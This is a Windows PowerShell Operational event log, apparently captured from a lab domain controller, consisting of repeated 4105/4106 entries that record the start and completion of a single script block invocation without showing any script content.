LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471445
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471444
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471443
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471442
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471441
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471440
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471439
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471438
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471437
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471436
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471435
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471434
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471433
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471432
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471431
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471430
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471429
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471428
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471427
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471426
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471425
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471424
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471423
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471422
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471421
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471420
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471419
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471418
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471417
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471416
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471415
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471414
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471413
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471412
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471411
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471410
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471409
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471408
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471407
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471406
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471405
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471404
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471403
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471402
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471401
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471400
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471399
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471398
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471397
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471396
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471395
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471394
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471393
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471392
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471391
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
